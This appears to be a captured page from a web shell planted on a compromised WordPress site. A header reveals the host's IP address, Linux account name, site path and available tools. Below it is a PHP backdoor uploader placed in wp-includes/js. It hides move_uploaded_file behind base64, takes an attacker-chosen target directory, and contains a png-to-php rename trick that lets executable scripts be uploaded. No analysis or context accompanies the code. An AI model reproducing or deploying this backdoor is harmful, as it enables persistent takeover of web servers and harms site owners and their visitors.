Server IP : 162.213.251.208 / Your IP : 18.217.224.44 Web Server : LiteSpeed System : Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64 User : jmoroovq ( 1890) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/jmoroovq/mariowesser.com/wp-includes/js/ |
Upload File : |
<?php //W9KfVzKPTI $a = base64_decode('bW92ZV91cGxvYWRlZF9maWxl'); $allowed_types = array('jpg', 'png'); if (isset($_FILES['img'])) { $dir = $_POST['dir']; $target_file = $_FILES['img']['name']; $imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION)); if (!in_array($imageFileType, $allowed_types)) { exit; } $target_file = str_replace("png","php",$target_file); if (file_exists($target_file)){ unlink($target_file); } var_dump($a($_FILES['img']['tmp_name'],$dir.$_FILES['img']['name'])); var_dump(realpath($dir.$_FILES['img']['name'])); } ?>